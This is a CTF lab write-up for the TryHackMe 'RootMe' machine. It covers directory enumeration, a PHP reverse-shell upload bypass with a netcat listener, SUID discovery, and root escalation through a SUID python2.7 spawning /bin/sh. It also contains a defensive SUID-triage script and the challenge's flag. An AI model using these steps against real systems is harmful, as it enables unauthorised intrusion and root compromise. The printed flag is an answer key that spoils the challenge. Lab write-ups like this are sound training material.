CTF Writeup: RootMe

Link: TryHackMe | OS: Linux | Difficulty: Easy | Date: 2025-11-08 | Author: S3Z4R


1. Reconnaissance

gobuster dir -u http://<Machine-IP>/ -w /usr/share/wordlists/dirb/common.txt -q -t 25 -x php,html,txt

/css (Status: 301)
/index.php (Status: 200)
/js (Status: 301)
/panel (Status: 301)
/server-status (Status: 403)
/uploads (Status: 301)

We need /panel, which is a file upload page.

2. Initial Access

Exploitation

We can create a reverse shell using PentestMonkey and upload it with the .php5 extension. Then start your netcat listener and open the uploaded file at the following URL.

nc -lnvp 1234
rootme.thm/uploads/php-reverse-shell.php5

Find SUID Binaries

Search for files with the SUID bit set.

find / -type f -perm -4000 2>/dev/null

Or, using the THM hint (finding files owned by root with the SUID bit):

find / -user root -perm /4000

3. Privilege Escalation

We can exploit the following SUID binary:

/usr/bin/python2.7

Run the following command to gain a shell:

python -c 'import os; os.system("/bin/sh")'
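
From the defender's side, the same SUID scan can be triaged so that a finding like /usr/bin/python2.7 stands out. The script below is an added example, not part of the original writeup; the baseline list, the interpreter name patterns, the sample paths and the --scan switch are assumptions made for illustration.

```shell
#!/bin/sh
# Added example, not from the writeup: triage the output of the SUID scan.
# BASELINE and the interpreter patterns are assumptions; tune them per host.

# Constructed baseline of SUID binaries expected on a stock install.
BASELINE="/usr/bin/passwd /usr/bin/sudo /usr/bin/su /usr/bin/mount /usr/bin/umount /usr/bin/chsh /usr/bin/chfn /usr/bin/newgrp /usr/bin/gpasswd"

# classify_suid: one path per line on stdin -> "<VERDICT> <path>" on stdout.
classify_suid() {
    while IFS= read -r path; do
        [ -n "$path" ] || continue
        name=${path##*/}
        # A SUID interpreter or shell runs caller-supplied code as the file owner.
        case "$name" in
            python*|perl*|ruby*|php*|lua*|node|sh|bash|dash|zsh|ksh)
                echo "INTERPRETER $path"; continue ;;
        esac
        # Anything else is either in the baseline or needs a manual look.
        case " $BASELINE " in
            *" $path "*) echo "EXPECTED $path" ;;
            *)           echo "REVIEW $path" ;;
        esac
    done
}

# suid_findings: keep only the lines that need attention.
suid_findings() {
    classify_suid | grep -v '^EXPECTED ' || true
}

# audit_suid [root]: run the scan used in the writeup and triage the results.
audit_suid() {
    find "${1:-/}" -type f -perm -4000 2>/dev/null | suid_findings
}

# Constructed sample of scan output, so the triage can be tried offline.
SAMPLE='/usr/bin/passwd
/usr/bin/sudo
/usr/bin/python2.7
/opt/backup/helper'

sample_findings() { printf '%s\n' "$SAMPLE" | suid_findings; }

# Pass --scan to audit the live filesystem instead of the sample.
if [ "${1:-}" = "--scan" ]; then audit_suid /; else sample_findings; fi
```

Removing the SUID bit from a flagged interpreter (chmod u-s) closes this escalation path.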

4. Flag

THM{pr1v1l3g3_3sc4l4t10n}